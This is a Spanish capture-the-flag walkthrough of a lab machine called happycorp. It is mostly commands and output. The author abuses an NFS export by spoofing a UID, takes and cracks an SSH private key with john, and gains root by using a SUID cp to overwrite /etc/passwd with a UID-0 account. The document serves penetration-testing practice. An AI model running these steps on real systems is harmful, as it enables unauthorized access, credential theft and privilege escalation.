
resumen en portada

Nota: para reparar la red de la maquina:
entro en la maquina y reconfiguro la red

1) Enumeración

  • Escaneo la red:
    ip a |grep global
    nmap -sn -T3
    jejo@em50l:~$ ip a |grep global
        inet brd scope global vboxnet0
    jejo@em50l:~$ nmap -sn -T3
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:16 CET
    Nmap scan report for
    Host is up (0.0017s latency).

  • Escaneo la ip de la maquina a pentestear:
    nmap -nT3
    jejo@em50l:~$ nmap -nT3 
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:32 CET
    Nmap scan report for
    Host is up (0.0030s latency).
    Not shown: 996 closed ports
    22/tcp   open  ssh
    80/tcp   open  http
    111/tcp  open  rpcbind
    2049/tcp open  nfs

  • escaneo http nmap -n -p 80 -script *http*
    jejo@em50l:~$ nmap -n -p 80 -script *http*
    Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:41 CET
    Nmap scan report for
    Host is up (0.00041s latency).
    80/tcp open  http
    | http-enum: 
    |   /admin.php: Possible admin folder
    |   /robots.txt: Robots file
    |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /img/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |   /lib/: Potentially interesting directory w/ listing on 'apache/2.4.25'
    |_  /manual/: Potentially interesting folder
    Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds

  • echemosle un ojo a la web (http):
    . happycorp1.jpg

  • echemosle un ojo al nfs:
    root@kali:~# showmount -e
    Export list for
    /home/karl *
    root@kali:~# mkdir /mnt/nfs
    root@kali:~# sudo mount -t nfs /mnt/nfs
    root@kali:~# ls -lha /mnt/nfs/
    total 28K
    drwxr-xr-x 3 1001 1001 4.0K Mar  5  2019 .
    drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
    lrwxrwxrwx 1 root root    9 Mar  5  2019 .bash_history -> /dev/null
    -rw-r--r-- 1 1001 1001  220 Mar  4  2019 .bash_logout
    -rw-r--r-- 1 1001 1001 3.5K Mar  5  2019 .bashrc
    -rw------- 1 1001 1001   28 Mar  4  2019 .lesshst
    -rw-r--r-- 1 1001 1001  675 Mar  4  2019 .profile
    drwx------ 2 1001 1001 4.0K Mar  5  2019 .ssh


  • Parece que la carpeta .ssh puede tener algo interesante.
    Veamos que contiene:
    root@kali:~# ls -lha /mnt/nfs/.ssh/
    ls: cannot open directory '/mnt/nfs/.ssh/': Permission denied

Permiso denegado (siendo root)????
Tendre que crear un usuario con el id 1001:
useradd --uid 1001 aux_user

    root@kali:~# useradd --uid 1001 aux_user
    root@kali:~# ls -lha /mnt/nfs/
    total 28K
    drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 .
    drwxr-xr-x 3 root     root     4.0K Oct 30 17:36 ..
    lrwxrwxrwx 1 root     root        9 Mar  5  2019 .bash_history -> /dev/null
    -rw-r--r-- 1 aux_user aux_user  220 Mar  4  2019 .bash_logout
    -rw-r--r-- 1 aux_user aux_user 3.5K Mar  5  2019 .bashrc
    -rw------- 1 aux_user aux_user   28 Mar  4  2019 .lesshst
    -rw-r--r-- 1 aux_user aux_user  675 Mar  4  2019 .profile
    drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .ssh

Ahora con los permisos del usuario 1001 ya deberia poder ver el contenido de .ssh Lo imaginado unos archivos(certificados) de acceso

    root@kali:~# su aux_user 
    $ ls -lha /mnt/nfs/.ssh
    total 24K
    drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .
    drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 ..
    -rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 authorized_keys
    -rw------- 1 aux_user aux_user 3.3K Mar  4  2019 id_rsa
    -rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 id_rsa.pub
    -rw-r--r-- 1 aux_user aux_user   18 Mar  4  2019 user.txt
    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/user.txt"

Conseguido Primer Flag flag1{Z29vZGJveQ}

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/authorized_keys"
    ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp

ok el usuario es karl

    root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa.pub"
    ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp

Y tenemos la llave privada. id_rsa

Veamos si nos deja entrar via ssh usando el certificado encontrado. ssh karl@ -i /mnt/nfs/.ssh/id_rsa

$ ssh karl@ -i /mnt/nfs/.ssh/id_rsa
Could not create directory '/home/aux_user/.ssh'.
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:uXiM0zLVXRQYHkhNxuTByBPb14pH1AJn6IpACByicCY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/aux_user/.ssh/known_hosts).
Enter passphrase for key '/mnt/nfs/.ssh/id_rsa': 

Ups Problema… necesitare averiguar la contraseña del certificado (archivo llave)….

Buscando un poco RSA PRIVATE KEY lost pass phrase`encuentro:
Encuentro: https://askubuntu.com/questions/346114/how-to-retrieve-passphrase-for-private-key

Segunda Busqueda: john rip RSA PRIVATE KEY

Leyendo veo que Falta el comando ssh2john (Lo busco con locate *2john)


root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
root@kali:~# su aux_user -c "cat  /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# python ./ssh2john.py id_rsa.crack > id_rsa.crack.txt

> Notas/Consultas utiles: `john --help` / `locate *rockyou*` / `locate john`
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa.crack)
1g 0:00:00:25 DONE (2019-11-19 17:12) 0.03897g/s 558912p/s 558912c/s 558912C/s *7¡Vamos!
Session completed
Parece que la contraseña es **`sheep`** ___________

## Probemos conexion ssh
root@kali:~# ssh karl@ -i id_rsa.crack
Enter passphrase for key 'id_rsa.crack': sheep
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 30 18:36:40 2019 from
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable

Ups parece que hay un problema: el shell no funciona bien.

Pruebo con un shell alternativo: ssh karl@ -i id_rsa.crack -t /bin/sh

root@kali:~# ssh karl@ -i id_rsa.crack -t /bin/sh
Enter passphrase for key 'id_rsa.crack': 
$ whoami

Escalada de privilegios: Enumeracion

  • Enumeracion (desde shell): Version sistema operativo y Kernel
    • uname -a / cat /etc/*release
      $ uname -a
      Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
      $ cat /etc/*release
      PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
    • Busqueda exploits para sis operativo y nucleo: searchsploit Debian 4.9
      root@kali:~# searchsploit Debian 4.9
      Exploits: No Result
      Shellcodes: No Result
      Sin Resultado.

Otra forma: auto_searchsploit.py

root@kali:~# https://raw.githubusercontent.com/ngalongc/AutoLocalPrivilegeEscalation/master/auto_priv_exploit.sh
root@kali:~# bash auto_priv_exploit.sh 4.9
[*] Possible Exploit

No possible exploit. Please use another version.

root@kali:~# python auto_searchsploit.py 4.9
[-] No potential exploit found. Aborting...

  • Enumeracion: LinEnum.sh
      Descargo Lienum o Copio archivo a la maquina destino
      root@kali:~# scp -i id_rsa.crack ./LinEnum.sh karl@
      Enter passphrase for key 'id_rsa.crack': 
      LinEnum.sh                           100%   45KB   4.0MB/s   00:00

      Demasiada informacion (la voy a filtrar un poco)
      -e [+] It looks like we have password hashes in /etc/passwd!
      -e [-] Available shells:
      # /etc/shells: valid login shells
      -e ### INTERESTING FILES ####################################
      -e [-] Useful file locations:
      -e [-] Installed compilers:
      ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
      ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler
      -e [+] Possibly interesting SUID files:
      -rwsr-xr-x 1 root root 130504 Feb 22  2017 /bin/cp

!!!comando cp con privilegios root!!!

Veamos si es explotable:

  • Enumeracion: LinuxSmartEnumeration lse.sh
      Aunque ya hemos enumeravo voy a dejar esta opcion
      root@kali:~# wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
      root@kali:~# scp -i id_rsa.crack ./lse.sh  karl@
      Enter passphrase for key 'id_rsa.crack': 
      lse.sh                                   100%   31KB   1.6MB/s   00:00    
      root@kali:~# ssh karl@ -i id_rsa.crack -t /bin/bash /tmp/lse.sh 
      Enter passphrase for key 'id_rsa.crack': 
              User: karl
           User ID: 1001
          Password: none
              Home: /home/karl
              Path: /usr/local/bin:/usr/bin:/bin:/usr/games
             umask: 0022
          Hostname: happycorp
             Linux: 4.9.0-8-amd64
      Distribution: Debian GNU/Linux 9.8 (stretch)
      Architecture: x86_64
      ==================================================================( users )=====
      [i] usr000 Current user groups............................................. yes!
      [*] usr010 Is current user in an administrative group?..................... nope
      [*] usr020 Are there other users in an administrative groups?.............. nope
      [*] usr030 Other users with shell.......................................... yes!
      [i] usr040 Environment information......................................... skip
      [i] usr050 Groups for other users.......................................... skip
      [i] usr060 Other users..................................................... skip
      ===================================================================( sudo )=====
      [!] sud000 Can we sudo without a password?................................. nope
      [!] sud010 Can we list sudo commands without a password?................... nope
      [*] sud040 Can we read /etc/sudoers?....................................... nope
      [*] sud050 Do we know if any other users used sudo?........................ nope
      ============================================================( file system )=====
      [*] fst000 Writable files outside user's home.............................. yes!
      [*] fst010 Binaries with setuid bit........................................ yes!
      [!] fst020 Uncommon setuid binaries........................................ yes!
      [!] fst030 Can we write to any setuid binary?.............................. nope
      [*] fst040 Binaries with setgid bit........................................ skip
      [!] fst050 Uncommon setgid binaries........................................ skip
      [!] fst060 Can we write to any setgid binary?.............................. skip
      [*] fst070 Can we read /root?.............................................. nope
      [*] fst080 Can we read subdirectories under /home?......................... nope
      [*] fst090 SSH files in home directories................................... yes!
      [*] fst100 Useful binaries................................................. yes!
      [*] fst110 Other interesting files in home directories..................... nope
      [!] fst120 Are there any credentials in fstab/mtab?........................ nope
      [*] fst130 Does 'karl' have mail?.......................................... nope
      [!] fst140 Can we access other users mail?................................. nope
      [*] fst150 Looking for GIT/SVN repositories................................ nope
      [!] fst160 Can we write to critical files?................................. nope
      [i] fst500 Files owned by user 'karl'...................................... skip
      [i] fst510 SSH files anywhere.............................................. skip
      [i] fst520 Check hosts.equiv file and its contents......................... skip
      [i] fst530 List NFS server shares.......................................... skip
      [i] fst540 Dump fstab file................................................. skip
      =================================================================( system )=====
      [i] sys000 Who is logged in................................................ skip
      [i] sys010 Last logged in users............................................ skip
      [!] sys020 Does the /etc/passwd have hashes?............................... yes!
      [!] sys030 Can we read /etc/shadow file?................................... nope
      [!] sys030 Can we read /etc/shadow- file?.................................. nope
      [!] sys030 Can we read /etc/shadow~ file?.................................. nope
      [!] sys030 Can we read /etc/master.passwd file?............................ nope
      [*] sys040 Check for other superuser accounts.............................. yes!
      [*] sys050 Can root user log in via SSH?................................... nope
      [i] sys060 List available shells........................................... skip
      [i] sys070 System umask in /etc/login.defs................................. skip
      [i] sys080 System password policies in /etc/login.defs..................... skip
      ===============================================================( security )=====
      [*] sec000 Is SELinux present?............................................. nope
      [*] sec010 List files with capabilities.................................... nope
      [!] sec020 Can we write to a binary with caps?............................. nope
      [!] sec030 Do we have all caps in any binary?.............................. nope
      [*] sec040 Users with associated capabilities.............................. nope
      [!] sec050 Does current user have capabilities?............................ skip
      ========================================================( recurrent tasks )=====
      [*] ret000 User crontab.................................................... nope
      [!] ret010 Cron tasks writable by user..................................... nope
      [*] ret020 Cron jobs....................................................... yes!
      [*] ret030 Can we read user crontabs....................................... nope
      [*] ret040 Can we list other user cron tasks?.............................. nope
      [!] ret050 Can we write to executable paths present in cron jobs........... nope
      [*] ret060 Can we write to any paths present in cron jobs.................. nope
      [i] ret400 Cron files...................................................... skip
      [*] ret500 User systemd timers............................................. nope
      [!] ret510 Can we write in any system timer?............................... nope
      [i] ret900 Systemd timers.................................................. skip
      ================================================================( network )=====
      [*] net000 Services listening only on localhost............................ nope
      [!] net010 Can we sniff traffic with tcpdump?.............................. nope
      [i] net500 NIC and IP information.......................................... skip
      [i] net510 Routing table................................................... skip
      [i] net520 ARP table....................................................... skip
      [i] net530 Namerservers.................................................... skip
      [i] net540 Systemd Nameservers............................................. skip
      [i] net550 Listening TCP................................................... skip
      [i] net560 Listening UDP................................................... skip
      ===============================================================( services )=====
      [!] srv000 Can we write in service files?.................................. nope
      [!] srv010 Can we write in binaries executed by services?.................. nope
      [*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
      [*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
      [*] srv040 Upstart files not belonging to root............................. nope
      [*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
      [i] srv400 Contents of /etc/inetd.conf..................................... skip
      [i] srv410 Contents of /etc/xinetd.conf.................................... skip
      [i] srv420 List /etc/xinetd.d if used...................................... skip
      [i] srv430 List /etc/init.d/ permissions................................... skip
      [i] srv440 List /etc/rc.d/init.d permissions............................... skip
      [i] srv450 List /usr/local/etc/rc.d permissions............................ skip
      [i] srv460 List /etc/init/ permissions..................................... skip
      [!] srv500 Can we write in systemd service files?.......................... nope
      [!] srv510 Can we write in binaries executed by systemd services?.......... nope
      [*] srv520 Systemd files not belonging to root............................. nope
      [i] srv900 Systemd config files permissions................................ skip
      ==============================================================( processes )=====
      [!] pro000 Can we write in any process binary?............................. nope
      [*] pro010 Processes running with root permissions......................... yes!
      [i] pro500 Running processes............................................... skip
      [i] pro510 Running process binaries and permissions........................ skip
      ===============================================================( software )=====
      [!] sof000 Can we connect to MySQL with root/root credentials?............. nope
      [!] sof010 Can we connect to MySQL as root without password?............... nope
      [!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
      [!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
      [!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
      [!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
      [*] sof030 Installed apache modules........................................ yes!
      [!] sof040 Found any .htpasswd files?...................................... nope
      [i] sof500 Sudo version.................................................... skip
      [i] sof510 MySQL version................................................... skip
      [i] sof520 Postgres version................................................ skip
      [i] sof530 Apache version.................................................. skip
      =============================================================( containers )=====
      [*] ctn000 Are we in a docker container?................................... nope
      [*] ctn010 Is docker available?............................................ nope
      [!] ctn020 Is the user a member of the 'docker' group?..................... nope
      [*] ctn200 Are we in a lxc container?...................................... nope
      [!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
      ==================================( FINISHED )==================================
      Connection to closed.
      A destacar:
      [!] fst020 Uncommon setuid binaries........................................ yes!

!!!comando cp con privilegios root!!!

Veamos si es explotable:

Escalada de privilegios: Explotacion Vulnerabilidades encontradas.


La estrategia seria:

  • Generar una linea de password:
    basandome en como es la linea de root en /etc/password Genero una linea parecida con un password en lugar d `:x:`
    root@kali:~# cat /etc/passwd | grep root
    root@kali:~# openssl passwd -1 -salt jejo jejo
    root@kali:~# echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash'
  • copiar el archivo /etc/password a una ruta temporal. (asi libero permisos)
    cp /etc/passwd /tmp/passwd

  • Añadir al archivo password la linea generada

    $ echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' >> /tmp/passwd
    /bin/sh: 13: cannot create /tmp/passwd: Permission denied
    Ups no me deja. pues añado la linea con nano y guardo como passwd2
  • Copiar el archivo password modificado a su ruta original
      $ cp /tmp/passwd2 /etc/passwd
      $ tail -2 /etc/passwd
      statd:x:107:65534::/var/lib/nfs:/bin/false jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash

Conseguido ROOT

$ su jejo
root@happycorp:/tmp# whoami

Aqui esta el Flag
root@happycorp:~# cat /root/root.txt
Here is some useless ascii art :)
           ,----------------,              ,---------,
        ,-----------------------,          ,"        ,"|
      ,"                      ,"|        ,"        ,"  |
     +-----------------------+  |      ,"        ,"    |
     |  .-----------------.  |  |     +---------+      |
     |  |                 |  |  |     | -==----'|      |
     |  |                 |  |  |     |         |      |
     |  |  Hacker God     |  |  |/----|`---=    |      |
     |  |  C:\>_          |  |  |   ,/|==== ooo |      ;
     |  |                 |  |  |  // |(((( [33]|    ,"
     |  `-----------------'  |," .;'| |((((     |  ,"
     +-----------------------+  ;;  | |         |,"
        /_)______________(_/  //'   | +---------+
   ___________________________/___  `,
  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
 / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
/_==__==========__==_ooo__ooo=_/'   /___________,"






A investigar: